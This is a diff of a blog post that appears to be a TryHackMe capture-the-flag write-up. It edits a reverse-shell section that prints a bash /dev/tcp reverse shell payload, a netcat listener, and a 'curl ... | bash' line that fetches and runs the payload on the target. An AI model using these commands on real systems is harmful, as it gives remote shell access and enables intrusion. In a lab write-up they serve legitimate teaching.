Xp10i7/Xp10i7.github.io/_posts/2022-05-01-THM{Tech_Supp0rt1}.md

 ```
 ### Reverse Shell

-Now, we'll be getting a reverse shell.
+We'll be getting a reverse shell.
 I wrote this simple reverse shell payload for this purpose `bash -i >& /dev/tcp/10.9.2.90/1234 0>&1`, save this payload in a .sh extension file.
-We will now start a simple http server `python3 -m http.server 8080` and start a netcat listener `nc -lvnp 1234` in a new terminal tab. </br>
+We will now start a simple http server `python3 -m http.server 8080` and start a netcat listener `nc -lvnp 1234` in a new terminal tab.

-Now, on the victim box, we'll be using curl `curl http://10.9.2.90:8080/shell.sh | bash`. </br>
+Now, on the victim box, we'll be using curl `curl http://10.9.2.90:8080/shell.sh | bash`.

 > curl tries to display the file contents in the shell so to take advantage of this we piped this to bash so that our payload could run.
 We did not use wget because it was giving a hard time in running.
 {: .prompt-info }